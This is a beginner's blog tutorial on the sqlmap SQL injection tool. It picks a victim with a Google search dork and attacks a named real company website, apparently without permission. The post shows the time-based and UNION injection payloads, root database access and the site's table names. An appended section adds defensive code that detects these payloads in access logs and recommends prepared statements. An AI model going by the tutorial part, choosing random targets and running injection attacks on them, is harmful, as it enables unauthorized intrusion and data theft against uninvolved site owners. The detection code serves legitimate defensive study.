sqlmap injection for beginners

    1 What is sqlmap

    sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

    sqlmap is an open-source tool that automatically detects and exploits SQL injection flaws and takes over database servers. It has a powerful detection engine and many useful features for fingerprinting the server and taking over the database server.

    ** In short, sqlmap is a tool for taking over sites.

    2 Installation

      Python 2.6 or 2.7; note that only these two major versions are supported. sqlmap can be installed with easy_install, or fetched from the repository with git clone.

    3 Finding a site

      Google hacking: inurl:".php?id=

      Let's just try the second result: www.cowinbio.com/about/index.php?id=1

      Let's go.

     blind (heavy query)' injectable
    [10:07:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [10:07:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [10:07:49] [INFO] target URL appears to be UNION injectable with 2 columns
    [10:07:49] [WARNING] combined UNION/error-based SQL injection case found on column 1. sqlmap will try to find another column with better characteristics
    [10:07:49] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
    sqlmap identified the following injection point(s) with a total of 2626 HTTP(s) requests:
    ---
    Parameter: id (GET)
        Type: AND/OR time-based blind

    Then

             _
     ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
    |_ -| . | |     | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|           |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 10:15:04
    
    you provided 'MySQL' as a back-end DBMS, but from a past scan information on the target URL sqlmap assumes the back-end DBMS is 'mysql <5.0.11'. Do you really want to force the back-end DBMS value? [y/N] y
    [10:15:22] [INFO] testing connection to the target URL
    [10:15:22] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
    [10:15:22] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: AND/OR time-based blind
        Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
        Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a7
    7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NU
    -- -
    ---
    [10:15:23] [INFO] testing MySQL
    [10:15:23] [INFO] confirming MySQL
    [10:15:23] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.6.9
    back-end DBMS: MySQL < 5.0.0
    [10:15:23] [INFO] fetching current user
    current user:    'root@localhost'

    And after that

             _
     ___ ___| |_____ ___ ___  {1.0-dev-c6d4217}
    |_ -| . | |     | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|           |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 10:16:44
    
    [10:16:44] [INFO] testing connection to the target URL
    [10:16:44] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
    [10:16:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: AND/OR time-based blind
        Title: MySQL <= 5.0.11 AND time-based blind (heavy query)
        Payload: id=1 AND 5889=BENCHMARK(5000000,MD5(0x6d6c765a))
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 2 columns
        Payload: id=-2036 UNION ALL SELECT CONCAT(0x716a767a71,0x674971454552444a79
    7526b7971714d71694b6b5a506f4c69575349416a704b705458645a554f6d,0x7162766271),NUL
    -- -
    ---
    [10:16:45] [INFO] testing MySQL
    [10:16:45] [INFO] confirming MySQL
    [10:16:45] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.6.9
    back-end DBMS: MySQL < 5.0.0
    [10:16:45] [INFO] fetching current database
    current database:    'cw'
    Database: cw
    [3 tables]
    +---------+
    | admin   |
    | news    |
    | product |
    +---------+

    Let's stop here. After all, this is a blog post. I did not go any further, and I hope readers will not try to go any further either.

    Also, a friendly reminder to this site: you are not very secure.

    Solemn declaration: the above article is my original work; please credit the source when reposting. Thanks from 小三爷~~.
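    Following up on that reminder, here is an added example (my own code, not part of the original post) of how a defender would spot the two probe shapes sqlmap reported above, the BENCHMARK() time-based payload and the UNION payload with hex string markers, in ordinary web-server access logs. The log lines are constructed, the addresses are documentation ranges, and the rule that `id` must be numeric is an assumption about the application.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed combined-format access-log lines (not from the site above); documentation
# IPs, and query strings that mirror the two payload shapes in the sqlmap output.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2015:10:07:47 +0800] "GET /about/index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Dec/2015:10:07:49 +0800] "GET /about/index.php?id=1%20AND%205889%3DBENCHMARK%285000000%2CMD5%280x6d6c765a%29%29 HTTP/1.1" 200 5120 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
203.0.113.5 - - [10/Dec/2015:10:07:50 +0800] "GET /about/index.php?id=-2036%20UNION%20ALL%20SELECT%20CONCAT%280x716a767a71%2C0x41%2C0x7162766271%29%2CNULL--%20- HTTP/1.1" 200 5310 "-" "sqlmap/1.0-dev (http://sqlmap.org)"
198.51.100.7 - - [10/Dec/2015:10:08:01 +0800] "GET /about/index.php?id=2 HTTP/1.1" 200 4990 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')

# Detection rules derived from the injection types in the sqlmap output above.
SIGNATURES = [
    ("time-based heavy query", re.compile(r"\b(BENCHMARK|SLEEP)\s*\(", re.I)),
    ("union-based", re.compile(r"\bUNION\b.*\bSELECT\b", re.I)),
    ("hex string marker", re.compile(r"0x[0-9a-f]{6,}", re.I)),
]
INTEGER_PARAMS = {"id"}  # assumption: the application only ever expects a numeric id

def inspect_request(path, user_agent):
    """Return the reasons a request looks like SQL injection probing (empty if clean)."""
    reasons = []
    if "sqlmap" in user_agent.lower():
        reasons.append("sqlmap user agent")
    # parse_qsl percent-decodes values, so the rules see the decoded payload text
    for name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        if name in INTEGER_PARAMS and not re.fullmatch(r"-?\d+", value):
            reasons.append(f"non-integer value for '{name}'")
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                reasons.append(f"{label} in '{name}'")
    return reasons

def analyze(log_text):
    """Parse each log line and return one finding per suspicious request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, ts, method, path, status, ua = m.groups()
        reasons = inspect_request(path, ua)
        if reasons:
            findings.append({"ip": ip, "time": ts, "path": path, "reasons": reasons})
    return findings
```

    Running analyze(SAMPLE_LOG) flags only the two sqlmap requests; the same rules fit a WAF or SIEM query, and the real fix is to bind id as an integer in a prepared statement rather than concatenating it into the query.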

    Original article: https://www.cnblogs.com/liuyuxing/p/5018612.html